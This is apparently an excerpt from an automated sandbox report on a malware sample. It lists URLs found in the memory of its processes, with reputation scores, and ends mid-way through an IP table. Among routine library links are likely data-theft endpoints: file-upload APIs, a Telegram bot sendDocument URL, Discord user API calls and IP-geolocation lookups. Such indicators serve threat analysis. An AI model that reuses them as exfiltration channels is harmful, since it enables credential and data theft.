                                  https://python.org/dev/peps/pep-0263/hacn.exe, 00000009.00000002.1905399144.00007FFDFB9AF000.00000002.00000001.01000000.00000012.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://tools.ietf.org/html/rfc2388#section-4.4based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.anonfiles.com/uploadbased.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngzbased.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://discord.com/api/v9/users/based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cacerts.digicert.cozbased.exe, 00000007.00000002.2150147759.00000235B9F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ip-api.commain.exe, 00000015.00000002.1999999146.0000025EB7D34000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963based.exe, 00000008.00000002.2126543094.000001EB87F80000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cacerts.digibased.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://peps.python.org/pep-0205/based.exe, 00000008.00000003.1889915648.000001EB86F1A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1889699362.000001EB86EE0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123009852.000001EB86F80000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://semver.org/svchost.exe, 00000020.00000002.2494944873.0000023340566000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000013.00000002.1988409193.0000022E557B1000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB7D34000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxybased.exe, 00000008.00000002.2127328411.000001EB88234000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688TS-240605-Millenium1.exe, 00000002.00000002.1855851675.000002874E048000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122521044.000001EB86AC8000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899911021.000001BF9992C000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmptrue
                                  • 11%, Virustotal, Browse
                                  • Sophos S4: malware repository domain
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerTS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/python/cpython/issues/86361.based.exe, 00000008.00000002.2123124196.000001EB871E2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1902852468.000001EB87852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1902852468.000001EB87804000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1905635031.000001EB87863000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://httpbin.org/based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.apache.org/licenses/svchost.exe, 00000016.00000003.1950071830.000002C3F582E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sbased.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlbased.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syTS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.python.org/psf/license/TS-240605-Millenium1.exe, TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB200000.00000040.00000001.01000000.00000005.sdmp, based.exe, based.exe, 00000008.00000002.2132559008.00007FFDFB200000.00000040.00000001.01000000.0000000E.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ip-api.com/line/?fields=hostingrbased.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cacerts.digicert.coCibased.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.anonfiles.com/uploadrbased.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tools.ietf.org/html/rfc6125#section-6.4.3based.exe, 00000008.00000002.2127328411.000001EB88234000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cacerts.digicertTS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://google.com/mailbased.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/file/botmain.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyhacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmbased.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://foss.heptapod.net/pypy/pypy/-/issues/3539based.exe, 00000008.00000002.2126543094.000001EB87F80000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB87812000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2125974666.000001EB87812000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120360311.000001EB8753C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124224043.000001EB87540000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://google.com/based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.gofile.io/getServerrbased.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.sectigo.com0based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.python.org/download/releases/2.3/mro/.TS-240605-Millenium1.exe, 00000002.00000003.1839123127.000002874E458000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1855851675.000002874DFC0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122521044.000001EB86A40000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1901068815.000001BF9A1E8000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://discordapp.com/api/v9/users/based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ip-api.com/json/?fields=225545rbased.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/urllib3/urllib3/issues/2920based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://yahoo.com/based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cacerts.digicert.coTS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000002.2150147759.00000235B9F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1923356570.000002C3F582D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.thawte.com/ThawteTimestampingCA.crl0based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://html.spec.whatwg.org/multipage/based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsbased.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.iana.org/time-zones/repository/tz-link.htmlbased.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.gofile.io/getServerbased.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://sectigo.com/CPS0based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cacerts.digicert.coRhacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.thawte.com0based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://json.orgbased.exe, 00000008.00000003.1899424084.000001EB87177000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.python.org/dev/peps/pep-0205/hacn.exe, 00000006.00000003.1869625462.0000024C988B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://twitter.com/based.exe, 00000008.00000003.2121494998.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.sqlite.org/copyright.html2s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2054080232.00007FFDF5458000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://google.com/based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://google.com/mail/based.exe, 00000008.00000003.2121207876.000001EB871FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cacerts.digiCibased.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://google.com/mail/based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123442930.000001EB87201000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121207876.000001EB871FF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngbased.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.openssl.org/Hbased.exe, 00000007.00000003.1876475016.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2131676898.00007FFDFAC30000.00000004.00000001.01000000.0000001C.sdmp, based.exe, 00000008.00000002.2138193378.00007FFE00828000.00000004.00000001.01000000.0000001D.sdmp, svchost.exe, 00000016.00000003.1957532160.000002C3F582E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://raw.githubusercontent.com~?0imain.exe, 00000015.00000002.1999999146.0000025EB7D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://aka.ms/pscore68powershell.exe, 00000013.00000002.1988409193.0000022E557B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);based.exe, 00000008.00000002.2122205502.000001EB850C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://system.data.sqlite.org/s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot-/sendDocument?chat_id=main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://peps.python.org/pep-0263/TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmp, based.exe, 00000008.00000002.2132559008.00007FFDFB16B000.00000040.00000001.01000000.0000000E.sdmpfalse
                                    unknown
                                    http://ip-api.com/line/?fields=hostingbased.exe, 00000008.00000002.2123009852.000001EB86F80000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    208.95.112.1
                                    ip-api.comUnited States
                                    53334TUT-ASUSfalse
                                    149.154.167.220
